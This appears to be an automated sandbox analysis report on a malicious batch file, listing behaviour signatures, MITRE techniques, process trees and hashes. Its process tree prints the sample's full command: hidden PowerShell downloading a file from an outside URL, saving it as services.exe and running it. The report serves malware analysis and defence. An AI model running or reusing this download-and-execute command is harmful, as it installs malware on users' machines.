Analysis
-
max time kernel
509s -
max time network
406s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
26/07/2024, 17:48
Static task
static1
Behavioral task
behavioral1
Sample
frdddd.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
frdddd.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral3
Sample
frdddd.bat
Resource
win11-20240709-en
General
-
Target
frdddd.bat
-
Size
255B
-
MD5
7cfc0e137d5d8b7f808add077083360b
-
SHA1
af7b34d385fdfcb6c1e0b37ce3908dcc437f3da9
-
SHA256
596217a3228f37bd8ac0ea92db6fc1b9fab378b96aea86ecd72e822809d948c5
-
SHA512
9b02fec89d4dfe4982a824c6b2f3c345c670285718e04c81d0e39e463e9d8f366fff04d892aea6464ef6a644c791aa86429c67e1411bfba6935385f047098ae0
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 1736 powershell.exe 14 4700 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 1736 powershell.exe 4700 powershell.exe 1736 powershell.exe 4700 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
pid Process 4380 services.exe 4836 services.exe 3100 services.exe 4164 services.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe -
System Location Discovery: System Language Discovery 1 TTPs 20 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language services.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language services.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language services.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language services.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4208 cmd.exe 1940 PING.EXE 4692 cmd.exe 516 PING.EXE 2180 cmd.exe 5064 PING.EXE 5048 cmd.exe 3972 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 3972 PING.EXE 1940 PING.EXE 516 PING.EXE 5064 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1736 powershell.exe 1736 powershell.exe 1736 powershell.exe 1736 powershell.exe 1736 powershell.exe 4700 powershell.exe 4700 powershell.exe 4700 powershell.exe 4700 powershell.exe 4700 powershell.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4568 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1736 powershell.exe Token: SeIncreaseQuotaPrivilege 4840 WMIC.exe Token: SeSecurityPrivilege 4840 WMIC.exe Token: SeTakeOwnershipPrivilege 4840 WMIC.exe Token: SeLoadDriverPrivilege 4840 WMIC.exe Token: SeSystemProfilePrivilege 4840 WMIC.exe Token: SeSystemtimePrivilege 4840 WMIC.exe Token: SeProfSingleProcessPrivilege 4840 WMIC.exe Token: SeIncBasePriorityPrivilege 4840 WMIC.exe Token: SeCreatePagefilePrivilege 4840 WMIC.exe Token: SeBackupPrivilege 4840 WMIC.exe Token: SeRestorePrivilege 4840 WMIC.exe Token: SeShutdownPrivilege 4840 WMIC.exe Token: SeDebugPrivilege 4840 WMIC.exe Token: SeSystemEnvironmentPrivilege 4840 WMIC.exe Token: SeRemoteShutdownPrivilege 4840 WMIC.exe Token: SeUndockPrivilege 4840 WMIC.exe Token: SeManageVolumePrivilege 4840 WMIC.exe Token: 33 4840 WMIC.exe Token: 34 4840 WMIC.exe Token: 35 4840 WMIC.exe Token: 36 4840 WMIC.exe Token: SeIncreaseQuotaPrivilege 4840 WMIC.exe Token: SeSecurityPrivilege 4840 WMIC.exe Token: SeTakeOwnershipPrivilege 4840 WMIC.exe Token: SeLoadDriverPrivilege 4840 WMIC.exe Token: SeSystemProfilePrivilege 4840 WMIC.exe Token: SeSystemtimePrivilege 4840 WMIC.exe Token: SeProfSingleProcessPrivilege 4840 WMIC.exe Token: SeIncBasePriorityPrivilege 4840 WMIC.exe Token: SeCreatePagefilePrivilege 4840 WMIC.exe Token: SeBackupPrivilege 4840 WMIC.exe Token: SeRestorePrivilege 4840 WMIC.exe Token: SeShutdownPrivilege 4840 WMIC.exe Token: SeDebugPrivilege 4840 WMIC.exe Token: SeSystemEnvironmentPrivilege 4840 WMIC.exe Token: SeRemoteShutdownPrivilege 4840 WMIC.exe Token: SeUndockPrivilege 4840 WMIC.exe Token: SeManageVolumePrivilege 4840 WMIC.exe Token: 33 4840 WMIC.exe Token: 34 4840 WMIC.exe Token: 35 4840 WMIC.exe Token: 36 4840 WMIC.exe Token: SeDebugPrivilege 4700 powershell.exe Token: SeIncreaseQuotaPrivilege 2252 WMIC.exe Token: SeSecurityPrivilege 2252 WMIC.exe Token: SeTakeOwnershipPrivilege 2252 WMIC.exe Token: SeLoadDriverPrivilege 2252 WMIC.exe Token: SeSystemProfilePrivilege 2252 WMIC.exe Token: SeSystemtimePrivilege 2252 WMIC.exe Token: SeProfSingleProcessPrivilege 2252 WMIC.exe Token: SeIncBasePriorityPrivilege 2252 WMIC.exe Token: SeCreatePagefilePrivilege 2252 WMIC.exe Token: SeBackupPrivilege 2252 WMIC.exe Token: SeRestorePrivilege 2252 WMIC.exe Token: SeShutdownPrivilege 2252 WMIC.exe Token: SeDebugPrivilege 2252 WMIC.exe Token: SeSystemEnvironmentPrivilege 2252 WMIC.exe Token: SeRemoteShutdownPrivilege 2252 WMIC.exe Token: SeUndockPrivilege 2252 WMIC.exe Token: SeManageVolumePrivilege 2252 WMIC.exe Token: 33 2252 WMIC.exe Token: 34 2252 WMIC.exe Token: 35 2252 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe 4568 taskmgr.exe -
Suspicious use of WriteProcessMemory 61 IoCs
description pid Process procid_target PID 3220 wrote to memory of 1736 3220 cmd.exe 76 PID 3220 wrote to memory of 1736 3220 cmd.exe 76 PID 1736 wrote to memory of 4380 1736 powershell.exe 77 PID 1736 wrote to memory of 4380 1736 powershell.exe 77 PID 1736 wrote to memory of 4380 1736 powershell.exe 77 PID 4380 wrote to memory of 5048 4380 services.exe 78 PID 4380 wrote to memory of 5048 4380 services.exe 78 PID 4380 wrote to memory of 5048 4380 services.exe 78 PID 5048 wrote to memory of 3972 5048 cmd.exe 79 PID 5048 wrote to memory of 3972 5048 cmd.exe 79 PID 5048 wrote to memory of 3972 5048 cmd.exe 79 PID 4380 wrote to memory of 2008 4380 services.exe 80 PID 4380 wrote to memory of 2008 4380 services.exe 80 PID 4380 wrote to memory of 2008 4380 services.exe 80 PID 2008 wrote to memory of 4840 2008 cmd.exe 81 PID 2008 wrote to memory of 4840 2008 cmd.exe 81 PID 2008 wrote to memory of 4840 2008 cmd.exe 81 PID 2320 wrote to memory of 4700 2320 cmd.exe 89 PID 2320 wrote to memory of 4700 2320 cmd.exe 89 PID 4700 wrote to memory of 4836 4700 powershell.exe 90 PID 4700 wrote to memory of 4836 4700 powershell.exe 90 PID 4700 wrote to memory of 4836 4700 powershell.exe 90 PID 4836 wrote to memory of 4208 4836 services.exe 91 PID 4836 wrote to memory of 4208 4836 services.exe 91 PID 4836 wrote to memory of 4208 4836 services.exe 91 PID 4208 wrote to memory of 1940 4208 cmd.exe 92 PID 4208 wrote to memory of 1940 4208 cmd.exe 92 PID 4208 wrote to memory of 1940 4208 cmd.exe 92 PID 4836 wrote to memory of 3520 4836 services.exe 93 PID 4836 wrote to memory of 3520 4836 services.exe 93 PID 4836 wrote to memory of 3520 4836 services.exe 93 PID 3520 wrote to memory of 2252 3520 cmd.exe 94 PID 3520 wrote to memory of 2252 3520 cmd.exe 94 PID 3520 wrote to memory of 2252 3520 cmd.exe 94 PID 3100 wrote to memory of 4692 3100 services.exe 98 PID 3100 wrote to memory of 4692 3100 services.exe 98 PID 3100 wrote to memory of 4692 3100 services.exe 98 PID 4692 wrote to memory of 516 4692 cmd.exe 99 PID 4692 wrote to memory of 516 4692 cmd.exe 99 PID 4692 wrote to memory of 516 4692 cmd.exe 99 PID 3100 wrote to memory of 652 3100 services.exe 100 PID 3100 wrote to memory of 652 3100 services.exe 100 PID 3100 wrote to memory of 652 3100 services.exe 100 PID 652 wrote to memory of 4628 652 cmd.exe 101 PID 652 wrote to memory of 4628 652 cmd.exe 101 PID 652 wrote to memory of 4628 652 cmd.exe 101 PID 424 wrote to memory of 4164 424 cmd.exe 106 PID 424 wrote to memory of 4164 424 cmd.exe 106 PID 424 wrote to memory of 4164 424 cmd.exe 106 PID 4164 wrote to memory of 2180 4164 services.exe 107 PID 4164 wrote to memory of 2180 4164 services.exe 107 PID 4164 wrote to memory of 2180 4164 services.exe 107 PID 2180 wrote to memory of 5064 2180 cmd.exe 108 PID 2180 wrote to memory of 5064 2180 cmd.exe 108 PID 2180 wrote to memory of 5064 2180 cmd.exe 108 PID 4164 wrote to memory of 928 4164 services.exe 109 PID 4164 wrote to memory of 928 4164 services.exe 109 PID 4164 wrote to memory of 928 4164 services.exe 109 PID 928 wrote to memory of 2696 928 cmd.exe 110 PID 928 wrote to memory of 2696 928 cmd.exe 110 PID 928 wrote to memory of 2696 928 cmd.exe 110
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\frdddd.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "$tempFile = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'services.exe'); Invoke-WebRequest -Uri 'https://pomf2.lain.la/f/fx2lvav.img' -OutFile $tempFile; Start-Process $tempFile -NoNewWindow -Wait"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\services.exe"C:\Users\Admin\AppData\Local\Temp\services.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\SysWOW64\PING.EXEping -n 1 1.1.1.15⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4176
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\frdddd.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "$tempFile = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), 'services.exe'); Invoke-WebRequest -Uri 'https://pomf2.lain.la/f/fx2lvav.img' -OutFile $tempFile; Start-Process $tempFile -NoNewWindow -Wait"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4700 -
C:\Users\Admin\AppData\Local\Temp\services.exe"C:\Users\Admin\AppData\Local\Temp\services.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4208 -
C:\Windows\SysWOW64\PING.EXEping -n 1 1.1.1.15⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1940
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2252
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\services.exe"C:\Users\Admin\AppData\Local\Temp\services.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.12⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\SysWOW64\PING.EXEping -n 1 1.1.1.13⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:516
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid3⤵
- System Location Discovery: System Language Discovery
PID:4628
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4568
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Users\Admin\AppData\Local\Temp\services.exeservices.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4164 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ping -n 1 1.1.1.13⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\PING.EXEping -n 1 1.1.1.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic csproduct get uuid3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic csproduct get uuid4⤵
- System Location Discovery: System Language Discovery
PID:2696
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD54180fc1109043ba70ff0e5ff26a9e1f8
SHA1799702b71147d7a5e8f1b71714a2b859909767d2
SHA256e1e2f4279d95c9f895c364e055769f17a9aefbb12e34cdebbefb9d345adc4836
SHA512fb74451d2dc999cf2db3e458ba98c272125a086c3b9561400a182221d1678485f4a8a41521ccf954706772c6f68fcbf41774aa446ff66044da42477bfc284364
-
Filesize
1KB
MD5aece9f8e9e62edea0f3703e245e1a208
SHA12af0a0b21427556b4263f095175f24503a21ca58
SHA256a0a51173f487e8c99c99cfb4d10d013ad60c90311461658f0e58fedc8b18d8f5
SHA512f4f2cffe4c318de2fe29f256db9c285b32d0e74de9ac8d37e614dd94f94afd914c848a29756de1e557550ac895788dc86f2875bb5f763324fc8fb3b3ec74758b
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
4.5MB
MD5b85914d36703377812cba113ca4638b7
SHA13c68a49b599dac13f4cb7cd327ad7c9c15313381
SHA2562ef086862494efd63cfacf30753bb2df9dd55f18d04e71fb912e79d47657b9d3
SHA51245ae20f08b16c8056cf4cd5a7e65f4f6b593cf41ca63431d0db153ddcfbbf28b1bff92800093cf48ca4b66c35afd3a626862559a247052b2ff5dc4c426a29a07